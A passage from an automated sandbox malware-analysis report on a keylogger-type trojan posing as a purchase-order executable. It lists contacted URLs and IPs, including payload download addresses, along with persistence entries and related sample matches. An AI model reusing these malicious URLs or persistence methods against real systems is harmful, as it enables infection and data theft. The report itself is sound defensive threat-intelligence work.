                                                                                                                                                    http://18.246.231.120/alg.exe, 0000000B.00000003.2522275296.0000000000567000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                    unknown
                                                                                                                                                    http://cvgrf.biz/zeXKjViL.exe, 00000022.00000002.2057791312.0000000005E90000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      http://208.117.43.225/pcyualg.exe, 0000000B.00000003.2508497113.00000000005D1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                      unknown
                                                                                                                                                      http://72.52.178.23:80/ewlGalg.exe, 0000000B.00000003.2043821981.00000000005B5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                      unknown
                                                                                                                                                      http://xlfhhhm.biz/iz/alg.exe, 0000000B.00000003.2334108033.0000000000567000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        http://54.244.188.177/0PO_2024_056209_MQ04865_ENQ_1045.exe, 00000008.00000002.1750433396.0000000001311000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                        unknown
                                                                                                                                                        http://ww7.przvgke.biz/ehlglgm?usid=27&utid=10221870153zeXKjViL.exe, 00000022.00000002.2058666059.0000000005EDE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        • Avira URL Cloud: malware
                                                                                                                                                        unknown
                                                                                                                                                        http://www.sajatypeworks.comPO_2024_056209_MQ04865_ENQ_1045.exe, 00000000.00000002.1772586821.0000000007112000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          http://oshhkdluh.biz/alg.exe, 0000000B.00000003.2490536622.0000000000567000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            https://www.google.comalg.exe, 0000000B.00000003.2487771643.00000000005F9000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2439037295.00000000005FA000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2478810531.00000000005F9000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2520863860.00000000005F8000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.1800763144.00000000005EB000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2469824753.00000000005F9000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2378250354.00000000007F0000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2374643516.00000000005FA000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2379239064.0000000001780000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2428261033.00000000005FA000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.1811075524.00000000005DE000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.1827012271.00000000005EC000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2403997151.00000000005FA000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2374942508.00000000005DC000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2448551766.00000000005F7000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.1811544228.00000000005EB000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2450029854.00000000005F8000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.1800787635.00000000017C0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2519990908.00000000005F3000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.1800665917.00000000005E3000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2374357802.00000000007F0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              http://www.founder.com.cn/cn/cThePO_2024_056209_MQ04865_ENQ_1045.exe, 00000000.00000002.1772586821.0000000007112000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                http://44.221.84.105/tloalmkxssnuriszeXKjViL.exe, 00000022.00000002.2057791312.0000000005E90000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                unknown
                                                                                                                                                                https://github.com/pq-crystals/kyber/commit/28413dfbf523fdde181246451c2bd77199c0f7ffDilithium2Dilithsetup.exe0.11.drfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://reallyfreegeoip.org/xml/8.46.123.189lMicrosofts.exe, 00000013.00000002.2962626553.000000000258E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://aka.ms/pscore6lBpowershell.exe, 00000016.00000002.1815132146.0000000004FC1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      http://82.112.184.197/yrkakyyujalg.exe, 0000000B.00000003.2043821981.00000000005B5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                      unknown
                                                                                                                                                                      http://13.251.16.150/kcogybxqholgdpl0u0umFalg.exe, 0000000B.00000003.2334108033.0000000000567000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                      unknown
                                                                                                                                                                      http://checkip.dyndns.org/qPO_2024_056209_MQ04865_ENQ_1045.exe, 00000008.00000002.1793222374.0000000004A24000.00000004.00000800.00020000.00000000.sdmp, Microsofts.exe, 00000013.00000000.1742198538.0000000000202000.00000002.00000001.01000000.0000000F.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://nuget.org/nuget.exepowershell.exe, 00000016.00000002.1836325671.0000000006033000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://reallyfreegeoip.org/xml/8.46.123.189dMicrosofts.exe, 00000013.00000002.2962626553.000000000258E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            http://www.galapagosdesign.com/DPleasePO_2024_056209_MQ04865_ENQ_1045.exe, 00000000.00000002.1772586821.0000000007112000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                              high
                                                                                                                                                                              http://18.246.231.120/kwsxhlpkribwfgalg.exe, 0000000B.00000003.2521205367.00000000005B5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                              unknown
                                                                                                                                                                              http://www.urwpp.deDPleasePO_2024_056209_MQ04865_ENQ_1045.exe, 00000000.00000002.1772586821.0000000007112000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                high
                                                                                                                                                                                http://www.zhongyicts.com.cnPO_2024_056209_MQ04865_ENQ_1045.exe, 00000000.00000002.1772586821.0000000007112000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  http://checkip.dyndns.org/dMicrosofts.exe, 00000013.00000002.2962626553.000000000258E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namePO_2024_056209_MQ04865_ENQ_1045.exe, 00000000.00000002.1743418494.0000000002E81000.00000004.00000800.00020000.00000000.sdmp, zeXKjViL.exe, 0000000A.00000002.1969679616.0000000003011000.00000004.00000800.00020000.00000000.sdmp, Microsofts.exe, 00000013.00000002.2962626553.0000000002511000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.1815132146.0000000004FC1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      http://schemas.microsoft.coAppVClient.exe, 0000000F.00000003.1738761071.00000000004E3000.00000004.00000020.00020000.00000000.sdmp, AppVClient.exe, 0000000F.00000003.1739252603.00000000004F2000.00000004.00000020.00020000.00000000.sdmp, AppVClient.exe, 0000000F.00000003.1738915554.00000000004EA000.00000004.00000020.00020000.00000000.sdmp, AppVClient.exe, 0000000F.00000002.1740234733.0000000000502000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                      unknown
                                                                                                                                                                                      https://clients.config.office.net/manage/v1.0/serviceabilitymanager/MsaDeviceTokenMsaLastUpdatedMsaEofficesvcmgr.exe.11.drfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        http://54.244.188.177/mshapsvealg.exe, 0000000B.00000003.1751356659.000000000059C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                                        unknown
                                                                                                                                                                                        http://44.221.84.105/alg.exe, 0000000B.00000003.1785481441.00000000005BC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                                        unknown
                                                                                                                                                                                        https://reallyfreegeoip.org/xml/PO_2024_056209_MQ04865_ENQ_1045.exe, 00000008.00000002.1793222374.0000000004A24000.00000004.00000800.00020000.00000000.sdmp, Microsofts.exe, 00000013.00000002.2962626553.000000000258E000.00000004.00000800.00020000.00000000.sdmp, Microsofts.exe, 00000013.00000000.1742198538.0000000000202000.00000002.00000001.01000000.0000000F.sdmpfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          http://54.244.188.177/mshapsvejFalg.exe, 0000000B.00000003.1751167364.00000000005BB000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.1752034139.00000000005BD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.1769440706.00000000005B9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                          unknown
                                                                                                                                                                                          http://54.244.188.177/6nohPO_2024_056209_MQ04865_ENQ_1045.exe, 00000008.00000002.1750433396.0000000001311000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                          unknown
                                                                                                                                                                                          http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000016.00000002.1815132146.0000000005115000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000016.00000002.1815132146.0000000005115000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                              high
                                                                                                                                                                                              http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000016.00000002.1815132146.0000000005115000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                high
                                                                                                                                                                                                https://go.micropowershell.exe, 00000016.00000002.1815132146.000000000591A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.1815132146.00000000056F5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  high
                                                                                                                                                                                                  https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881118.0.1alg.exe, 0000000B.00000003.2654340509.00000000007B0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    high
                                                                                                                                                                                                    http://13.251.16.150:80/kcogybxqholgdplrobatalg.exe, 0000000B.00000003.2334108033.00000000005B5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    https://contoso.com/Iconpowershell.exe, 00000016.00000002.1836325671.0000000006033000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      high
                                                                                                                                                                                                      http://checkip.dyndns.orgMicrosofts.exe, 00000013.00000002.2962626553.000000000258E000.00000004.00000800.00020000.00000000.sdmp, Microsofts.exe, 00000013.00000002.2962626553.000000000257C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        high
                                                                                                                                                                                                        https://pcnatrk.net/track.alg.exe, 0000000B.00000003.1811642166.0000000001830000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.1810999604.00000000005F1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          high
                                                                                                                                                                                                          https://github.com/Pester/Pesterpowershell.exe, 00000016.00000002.1815132146.0000000005115000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            high
                                                                                                                                                                                                            http://47.129.31.212/ldalg.exe, 0000000B.00000003.2319647398.00000000005C4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                                                            unknown
                                                                                                                                                                                                            http://www.carterandcone.comlPO_2024_056209_MQ04865_ENQ_1045.exe, 00000000.00000002.1772586821.0000000007112000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              high
                                                                                                                                                                                                              http://18.141.10.107/snkwxvqngvs_zeXKjViL.exe, 00000022.00000002.1998728250.0000000001192000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              http://www.fontbureau.com/designers/frere-user.htmlPO_2024_056209_MQ04865_ENQ_1045.exe, 00000000.00000002.1772586821.0000000007112000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                high
                                                                                                                                                                                                                http://82.112.184.197:80/yrkakyyujalg.exe, 0000000B.00000003.2043821981.00000000005B5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                http://13.251.16.150/kcogybxqholgdplalg.exe, 0000000B.00000003.2334108033.00000000005B5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                http://ww7.fwiwk.biz/m?usid=27&utid=10221880067alg.exe, 0000000B.00000003.2487771643.00000000005F9000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2378624503.00000000005DF000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2439037295.00000000005FA000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2478810531.00000000005F9000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2520863860.00000000005F8000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2469824753.00000000005F9000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2374643516.00000000005FA000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2428261033.00000000005FA000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2403997151.00000000005FA000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2381504483.00000000005DF000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2379712272.00000000005DE000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2448551766.00000000005F7000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2450029854.00000000005F8000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2519990908.00000000005F3000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2389962725.00000000005DD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2421255187.00000000005FA000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2507445109.00000000005F9000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2374942508.00000000005DF000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2456649330.00000000005F7000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2380661999.00000000005FA000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000B.00000003.2395959016.00000000005DD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                • Avira URL Cloud: phishing
                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                http://208.117.43.225/rbdfcjngs3alg.exe, 0000000B.00000003.2404953266.00000000005B5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                http://72.52.178.23/yNzeXKjViL.exe, 00000022.00000002.2058666059.0000000005EE3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000016.00000002.1815132146.0000000005115000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  high
                                                                                                                                                                                                                  https://reallyfreegeoip.orgMicrosofts.exe, 00000013.00000002.2962626553.000000000258E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    high
                                                                                                                                                                                                                    http://18.246.231.120/kwsxhlpkribwfgiGalg.exe, 0000000B.00000003.2522275296.0000000000567000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                    https://github.com/pq-crystals/kyber/commit/28413dfbf523fdde181246451c2bd77199c0f7ffsetup.exe0.11.drfalse
                                                                                                                                                                                                                      high
                                                                                                                                                                                                                      http://82.112.184.197/alg.exe, 0000000B.00000003.2043821981.000000000059C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        high
                                                                                                                                                                                                                        http://www.fontbureau.com/designersGPO_2024_056209_MQ04865_ENQ_1045.exe, 00000000.00000002.1772586821.0000000007112000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          high
                                                                                                                                                                                                                          http://www.fontbureau.com/designers/?PO_2024_056209_MQ04865_ENQ_1045.exe, 00000000.00000002.1772586821.0000000007112000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                            high
                                                                                                                                                                                                                            http://72.52.178.23:80/mt0alg.exe, 0000000B.00000003.2404953266.00000000005B5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                                                                            unknown
                                                                                                                                                                                                                            http://www.founder.com.cn/cn/bThePO_2024_056209_MQ04865_ENQ_1045.exe, 00000000.00000002.1772586821.0000000007112000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              high
                                                                                                                                                                                                                              http://72.52.178.23/~NzeXKjViL.exe, 00000022.00000002.2058666059.0000000005EE3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                              http://www.fontbureau.com/designers?PO_2024_056209_MQ04865_ENQ_1045.exe, 00000000.00000002.1772586821.0000000007112000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                high
                                                                                                                                                                                                                                http://208.117.43.225/salg.exe, 0000000B.00000003.2404953266.000000000059C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                                https://contoso.com/Licensepowershell.exe, 00000016.00000002.1836325671.0000000006033000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                  high
                                                                                                                                                                                                                                  http://54.244.188.177:80/vcdhvtdnisalg.exe, 0000000B.00000003.2490536622.00000000005B5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                                  http://www.tiro.comPO_2024_056209_MQ04865_ENQ_1045.exe, 00000000.00000002.1772586821.0000000007112000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                    high
                                                                                                                                                                                                                                    • No. of IPs < 25%
                                                                                                                                                                                                                                    • 25% < No. of IPs < 50%
                                                                                                                                                                                                                                    • 50% < No. of IPs < 75%
                                                                                                                                                                                                                                    • 75% < No. of IPs
                                                                                                                                                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                                    132.226.8.169
                                                                                                                                                                                                                                    checkip.dyndns.comUnited States
                                                                                                                                                                                                                                    16989UTMEMUSfalse
                                                                                                                                                                                                                                    13.248.148.254
                                                                                                                                                                                                                                    084725.parkingcrew.netUnited States
                                                                                                                                                                                                                                    16509AMAZON-02USfalse
                                                                                                                                                                                                                                    3.94.10.34
                                                                                                                                                                                                                                    ytctnunms.bizUnited States
                                                                                                                                                                                                                                    14618AMAZON-AESUSfalse
                                                                                                                                                                                                                                    34.246.200.160
                                                                                                                                                                                                                                    tbjrpv.bizUnited States
                                                                                                                                                                                                                                    16509AMAZON-02USfalse
                                                                                                                                                                                                                                    199.59.243.227
                                                                                                                                                                                                                                    76899.bodis.comUnited States
                                                                                                                                                                                                                                    395082BODIS-NJUSfalse
                                                                                                                                                                                                                                    35.164.78.200
                                                                                                                                                                                                                                    nqwjmb.bizUnited States
                                                                                                                                                                                                                                    16509AMAZON-02USfalse
                                                                                                                                                                                                                                    165.160.13.20
                                                                                                                                                                                                                                    myups.bizUnited States
                                                                                                                                                                                                                                    19574CSCUSfalse
                                                                                                                                                                                                                                    34.227.7.138
                                                                                                                                                                                                                                    deoci.bizUnited States
                                                                                                                                                                                                                                    14618AMAZON-AESUSfalse
                                                                                                                                                                                                                                    208.117.43.225
                                                                                                                                                                                                                                    gytujflc.bizUnited States
                                                                                                                                                                                                                                    32748STEADFASTUSfalse
                                                                                                                                                                                                                                    72.52.178.23
                                                                                                                                                                                                                                    fwiwk.bizUnited States
                                                                                                                                                                                                                                    32244LIQUIDWEBUSfalse
                                                                                                                                                                                                                                    44.221.84.105
                                                                                                                                                                                                                                    saytjshyf.bizUnited States
                                                                                                                                                                                                                                    14618AMAZON-AESUSfalse
                                                                                                                                                                                                                                    188.114.96.3
                                                                                                                                                                                                                                    reallyfreegeoip.orgEuropean Union
                                                                                                                                                                                                                                    13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                    54.244.188.177
                                                                                                                                                                                                                                    oshhkdluh.bizUnited States
                                                                                                                                                                                                                                    16509AMAZON-02USfalse
                                                                                                                                                                                                                                    13.251.16.150
                                                                                                                                                                                                                                    ifsaia.bizUnited States
                                                                                                                                                                                                                                    16509AMAZON-02USfalse
                                                                                                                                                                                                                                    47.129.31.212
                                                                                                                                                                                                                                    xlfhhhm.bizCanada
                                                                                                                                                                                                                                    34533ESAMARA-ASRUfalse
                                                                                                                                                                                                                                    18.246.231.120
                                                                                                                                                                                                                                    jpskm.bizUnited States
                                                                                                                                                                                                                                    16509AMAZON-02USfalse
                                                                                                                                                                                                                                    82.112.184.197
                                                                                                                                                                                                                                    vjaxhpbji.bizRussian Federation
                                                                                                                                                                                                                                    43267FIRST_LINE-SP_FOR_B2B_CUSTOMERSUPSTREAMSRUfalse
                                                                                                                                                                                                                                    18.141.10.107
                                                                                                                                                                                                                                    ssbzmoy.bizUnited States
                                                                                                                                                                                                                                    16509AMAZON-02USfalse
                                                                                                                                                                                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                                    Analysis ID:1582674
                                                                                                                                                                                                                                    Start date and time:2024-12-31 09:04:08 +01:00
                                                                                                                                                                                                                                    Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                                    Overall analysis duration:0h 13m 18s
                                                                                                                                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                                    Report type:full
                                                                                                                                                                                                                                    Cookbook file name:default.jbs
                                                                                                                                                                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                                    Number of analysed new started processes analysed:34
                                                                                                                                                                                                                                    Number of new started drivers analysed:3
                                                                                                                                                                                                                                    Number of existing processes analysed:0
                                                                                                                                                                                                                                    Number of existing drivers analysed:0
                                                                                                                                                                                                                                    Number of injected processes analysed:0
                                                                                                                                                                                                                                    Technologies:
                                                                                                                                                                                                                                    • HCA enabled
                                                                                                                                                                                                                                    • EGA enabled
                                                                                                                                                                                                                                    • AMSI enabled
                                                                                                                                                                                                                                    Analysis Mode:default
                                                                                                                                                                                                                                    Analysis stop reason:Timeout
                                                                                                                                                                                                                                    Sample name:PO_2024_056209_MQ04865_ENQ_1045.exe
                                                                                                                                                                                                                                    Detection:MAL
                                                                                                                                                                                                                                    Classification:mal100.spre.troj.spyw.expl.evad.winEXE@38/153@40/18
                                                                                                                                                                                                                                    EGA Information:
                                                                                                                                                                                                                                    • Successful, ratio: 91.7%
                                                                                                                                                                                                                                    HCA Information:
                                                                                                                                                                                                                                    • Successful, ratio: 84%
                                                                                                                                                                                                                                    • Number of executed functions: 268
                                                                                                                                                                                                                                    • Number of non-executed functions: 46
                                                                                                                                                                                                                                    Cookbook Comments:
                                                                                                                                                                                                                                    • Found application associated with file extension: .exe
                                                                                                                                                                                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, DiagnosticsHub.StandardCollector.Service.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
                                                                                                                                                                                                                                    • Excluded IPs from analysis (whitelisted): 184.28.90.27, 52.149.20.212, 13.107.246.45
                                                                                                                                                                                                                                    • Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                                                    • Execution Graph export aborted for target Trading_AIBot.exe, PID 3448 because it is empty
                                                                                                                                                                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                                                                    • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                                                                                                                    • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                                    • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                                                                                                                    • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                                                                                    • Report size getting too big, too many NtWriteFile calls found.
                                                                                                                                                                                                                                    • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                                    TimeTypeDescription
                                                                                                                                                                                                                                    03:05:02API Interceptor1x Sleep call for process: PO_2024_056209_MQ04865_ENQ_1045.exe modified
                                                                                                                                                                                                                                    03:05:04API Interceptor75x Sleep call for process: powershell.exe modified
                                                                                                                                                                                                                                    03:05:07API Interceptor32x Sleep call for process: alg.exe modified
                                                                                                                                                                                                                                    03:05:18API Interceptor5x Sleep call for process: zeXKjViL.exe modified
                                                                                                                                                                                                                                    03:05:51API Interceptor993x Sleep call for process: apihost.exe modified
                                                                                                                                                                                                                                    08:05:04Task SchedulerRun new task: zeXKjViL path: C:\Users\user\AppData\Roaming\zeXKjViL.exe
                                                                                                                                                                                                                                    08:05:09AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\apihost.exe.lnk
                                                                                                                                                                                                                                    08:05:11Task SchedulerRun new task: AccSys path: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe
                                                                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                    132.226.8.169Azygoses125.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                                    • checkip.dyndns.org/
                                                                                                                                                                                                                                    PARATRANSFARI REMINDER.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                                                                                    • checkip.dyndns.org/
                                                                                                                                                                                                                                    F.O Pump Istek,Docx.batGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                                                                                                                                                                                                                    • checkip.dyndns.org/
                                                                                                                                                                                                                                    0001.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                                                                                    • checkip.dyndns.org/
                                                                                                                                                                                                                                    PK241200518-EMAIL RELEASE-pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                                    • checkip.dyndns.org/
                                                                                                                                                                                                                                    PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeGet hashmaliciousVIP KeyloggerBrowse
                                                                                                                                                                                                                                    • checkip.dyndns.org/
                                                                                                                                                                                                                                    CITAS_pif.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                                                                                    • checkip.dyndns.org/
                                                                                                                                                                                                                                    conferma..exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                                                                                    • checkip.dyndns.org/
                                                                                                                                                                                                                                    file.exeGet hashmaliciousSnake KeyloggerBrowse
